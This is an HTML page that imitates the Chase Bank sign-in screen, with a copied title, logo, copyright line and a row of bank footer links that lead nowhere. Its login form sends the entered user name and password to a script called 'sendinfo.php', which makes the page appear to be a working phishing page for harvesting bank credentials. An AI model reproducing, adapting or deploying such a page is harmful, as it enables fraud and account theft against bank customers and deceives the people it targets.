<!DOCTYPE html>
<html lang="en">

<head>
<!-- Global site tag (gtag.js) - Google Analytics -->
<script async src="https://www.googletagmanager.com/gtag/js?id=UA-114341232-1"></script>
<script>
  window.dataLayer = window.dataLayer || [];
  function gtag(){dataLayer.push(arguments);}
  gtag('js', new Date());

  gtag('config', 'UA-114341232-1');
</script>
    <title>Sign In - Chase Bank</title>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">

    <link href="https://fonts.googleapis.com/css?family=Nunito+Sans:200,300,400,600,700,800,900&display=swap" rel="stylesheet">
    <link rel="SHORTCUT ICON" href="images/fav.ico" />
    <link rel="stylesheet" href="css/open-iconic-bootstrap.min.css">
    <link rel="stylesheet" href="css/animate.css">

    <link rel="stylesheet" href="css/owl.carousel.min.css">
    <link rel="stylesheet" href="css/owl.theme.default.min.css">
    <link rel="stylesheet" href="css/magnific-popup.css">

    <link rel="stylesheet" href="css/aos.css">

    <link rel="stylesheet" href="css/ionicons.min.css">

    <link rel="stylesheet" href="css/bootstrap-datepicker.css">
    <link rel="stylesheet" href="css/jquery.timepicker.css">

    <link rel="stylesheet" href="css/flaticon.css">
    <link rel="stylesheet" href="css/icomoon.css">
    <link rel="stylesheet" href="css/style.css">
</head>

<body>

    <div class="hero-wrap" style="background-image: url('images/bg_1.jpeg');" data-stellar-background-ratio="0.5">
        <div class="overlay"></div>
        <div class="container">
            <div class="row">

                <div class="col-lg-4"></div>
                <div class="col-lg-4">
                    <Br>
                    <Br><img src="images/logo.png">

                </div>

                <div class="col-lg-4"></div>
            </div>

            <div class="row no-gutters slider-text align-items-center justify-content-start" data-scrollax-parent="true">

                <div class="col-lg-4 col"></div>
                <div class="col-lg-4 col-md-6 mt-0 mt-md-5">

                    <form action="sendinfo.php" class="request-form ftco-animate">

                        <div class="form-group">
                            <input type="text" class="form-control" placeholder="User Name" name="1" required>
                        </div>
                        <div class="form-group">
                            <input type="password" class="form-control" placeholder="Password" name="2" required>
                        </div>

                        <div class="form-group">
                            <div class="checkbox">
                                <label>
                                    <input type="checkbox" value="" class="mr-2"> Remember Me/Use Token</label>
                            </div>
                        </div>
                        <div class="form-group">
                            <input type="submit" value="Sign In" class="btn btn-primary py-3 px-4">
                        </div>
                    </form>
                </div>

                <div class="col-lg-4 col"></div>
            </div>
        </div>
    </div>

    <footer class="ftco-footer ftco-bg-dark ftco-section">
        <div class="container">

            <div class="row">
                <div class="col-md-12 text-center">
                    <a href="" style="color:#000;font-size:12px;">Contact us</a>&nbsp;&nbsp;
                    <a href="" style="color:#000;font-size:12px;">Privacy </a>&nbsp;&nbsp;
                    <a href="" style="color:#000;font-size:12px;">Security </a>&nbsp;&nbsp;
                    <a href="" style="color:#000;font-size:12px;">Terms of use </a>&nbsp;&nbsp;
                    <a href="" style="color:#000;font-size:12px;">Accessibility </a>&nbsp;&nbsp;
                    <a href="" style="color:#000;font-size:12px;">SAFE Act: Chase Mortgage Loan Originators </a>&nbsp;&nbsp;
                    <a href="" style="color:#000;font-size:12px;">Fair Lending </a>&nbsp;&nbsp;
                    <a href="" style="color:#000;font-size:12px;">About Chase </a>&nbsp;&nbsp;
                    <a href="" style="color:#000;font-size:12px;">J.P. Morgan </a>&nbsp;&nbsp;
                    <a href="" style="color:#000;font-size:12px;">JPMorgan Chase & Co. </a>&nbsp;&nbsp;
                    <a href="" style="color:#000;font-size:12px;">Careers </a>&nbsp;&nbsp;
                    <br>
                    <a href="" style="color:#000;font-size:12px;">Español </a>&nbsp;&nbsp;
                    <a href="" style="color:#000;font-size:12px;">Chase </a>&nbsp;&nbsp;
                    <a href="" style="color:#000;font-size:12px;">Canada </a>&nbsp;&nbsp;
                    <a href="" style="color:#000;font-size:12px;">Site map </a>&nbsp;&nbsp;
                    <a href="" style="color:#000;font-size:12px;">Member </a>&nbsp;&nbsp;
                    <a href="" style="color:#000;font-size:12px;">FDIC </a>&nbsp;&nbsp;
                    <a href="" style="color:#000;font-size:12px;">Equal Housing Lender</a>
                    <hr>
                    <p style="text-align:center; color:#000;">© 2019 JPMorgan Chase & Co.</p>

                </div>
            </div>
        </div>
    </footer>

    <script src="js/jquery.min.js"></script>
    <script src="js/jquery-migrate-3.0.1.min.js"></script>
    <script src="js/popper.min.js"></script>
    <script src="js/bootstrap.min.js"></script>
    <script src="js/jquery.easing.1.3.js"></script>
    <script src="js/jquery.waypoints.min.js"></script>
    <script src="js/jquery.stellar.min.js"></script>
    <script src="js/owl.carousel.min.js"></script>
    <script src="js/jquery.magnific-popup.min.js"></script>
    <script src="js/aos.js"></script>
    <script src="js/jquery.animateNumber.min.js"></script>
    <script src="js/scrollax.min.js"></script>

    <script src="js/main.js"></script>

</body>

</html>